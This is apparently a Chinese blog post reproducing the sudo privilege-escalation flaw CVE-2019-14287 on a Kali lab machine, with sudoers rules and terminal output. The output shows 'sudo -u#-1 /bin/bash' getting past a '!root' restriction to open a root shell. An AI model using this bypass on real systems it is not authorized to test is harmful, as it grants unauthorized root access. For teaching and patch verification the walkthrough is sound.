CVE-2019-14287:sudo 权限提升漏洞

0x00 漏洞介绍

sudo本地权限提升漏洞(CVE-2019-14287),是由于sudo配置文件配置不当造成的,此漏洞可以使普通用户绕过限制以root身份执行命令

0x01 影响版本

sudo < 1.8.28

0x02 sudo作用

sudo是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,这样不仅减少了root用户的登录 和管理时间,同样也提高了安全性

0x03 sudo权限

sudo权限控制在配置文件/etc/sudoers 中,该文件权限如下

root@kali:~# ls -al /etc/sudoers
-r--r----- 1 root root 669 Aug  7 02:58 /etc/sudoers

0x04 漏洞复现

系统平台:kali-2019.03

root@kali:~# lsb_release -a
No LSB modules are available.
Distributor ID:    Kali
Description:    Kali GNU/Linux Rolling
Release:    2019.3
Codename:    kali-rolling

sudo版本

root@kali:~# sudo -V
Sudo version 1.8.27

备份sudo配置文件

root@kali:~# cp /etc/sudoers /etc/sudoers.bak
root@kali:~# ls -al /etc/sudoers*
-r--r----- 1 root root  669 Aug  7 02:58 /etc/sudoers
-r--r----- 1 root root  669 Nov  2 15:37 /etc/sudoers.bak
/etc/sudoers.d:
total 20
drwxr-xr-x   2 root root  4096 Oct 29 17:25 .
drwxr-xr-x 163 root root 12288 Nov  2 15:37 ..
-r--r-----   1 root root   958 Aug  7 02:58 README

新建普通用户

root@kali:~# useradd test
root@kali:~# passwd test
New password:
Retype new password:
passwd: password updated successfully
root@kali:~# useradd world
root@kali:~# passwd world
New password:
Retype new password:
passwd: password updated successfully

修改sudo配置文件

#打开配置文件
visudo

在配置文件添加以下内容,允许test用户可以以所有用户的身份运行id命令

#添加内容
test ALL=(ALL)  /usr/bin/id

命令测试

root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ id
uid=1000(test) gid=1000(test) groups=1000(test)
$ sudo -u root id


We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:


    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.


[sudo] password for test:
uid=0(root) gid=0(root) groups=0(root)
$ sudo -u world id
uid=1001(world) gid=1001(world) groups=1001(world)
$ sudo -u root whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as root on kali.
$ sudo -u world whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as world on kali.
$
root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u#0 id
uid=0(root) gid=0(root) groups=0(root)
$ sudo -u#1001 id
uid=1001(world) gid=1001(world) groups=1001(world)
$ sudo -u#0 whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as root on kali.
$ sudo -u#1001 whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as world on kali.
$

漏洞发现

root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u#-1 id
uid=0(root) gid=1000(test) groups=1000(test)
$   

重新配置sudo配置文件,允许test用户可以以除了root用户以外的所有用户身份执行任意的命令

test ALL=(ALL,!root) ALL 

命令测试

root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u test id
uid=1000(test) gid=1000(test) groups=1000(test)
$ sudo -u test whoami
test
$ sudo -u root id
Sorry, user test is not allowed to execute '/usr/bin/id' as root on kali.
$ sudo -u root whoami
Sorry, user test is not allowed to execute '/usr/bin/whoami' as root on kali.
$

漏洞触发

root@kali:~# su - test
su: warning: cannot change directory to /home/test: No such file or directory
$ sudo -u#-1 id
uid=0(root) gid=1000(test) groups=1000(test)
$ sudo -u#-1 whoami
root
$ sudo -u#-1 /bin/bash
root@kali:/root# id
uid=0(root) gid=1000(test) groups=1000(test)
root@kali:/root# whoami
root
root@kali:/root#
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值